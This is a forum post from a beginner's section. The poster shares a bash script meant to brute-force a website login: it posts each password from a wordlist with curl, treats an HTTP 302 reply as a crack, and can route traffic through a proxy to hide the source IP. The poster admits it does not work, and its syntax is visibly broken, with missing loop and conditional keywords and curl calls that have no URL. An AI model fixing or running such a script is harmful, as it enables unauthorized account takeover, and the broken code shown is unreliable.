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Messages - Red_Tuna

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Beginner's Corner / Is this even possible to do?
« on: August 09, 2015, 01:34:45 AM »
So i was just trying things for fun and editing a bunch of stuff here and there and came up with this "So-Called" Dictionary attack using shell script. Would this even work? Solved my question. Doesnt work. Ill update something new that might.

Code: (bash) [Select]
#!/usr/bin/env bash

echo -n "Enter domain address of website:"
read name

echo -n "Enter username for login:"
read username

echo -n "Would you like to proxy?(Y/N)?"

read proxy

if [ $proxy == 'Y' ]
echo -n "Current ip is:"
curl ; echo
echo -n  "Enter ip and port of proxy(EX:"
read proxyip
export http_proxy=http://$proxyip
echo -n "Current ip is:"
curl ; echo


n=`cat john.txt | wc -l`
for (( i=1; i <= $n; i++));

password=`sed -n "$i"p john.txt`
 http_code=$(curl -L --data-urlencode  user="$username" --data-urlencode password="$password" "$name" -w '%{http_code}' -o /dev/null -s)
echo "Trying password: '$password'"
    if [[ $http_code -eq 302 ]]; then
      echo "Password is cracked: '$password'"
      break 2

Credit goes to some people's scripts i used to make some of this. 75% is mine. Give me your worst :D i'm a noob.

Staff note: Next time, use the code tags if your going to post code.

Pages: [1]

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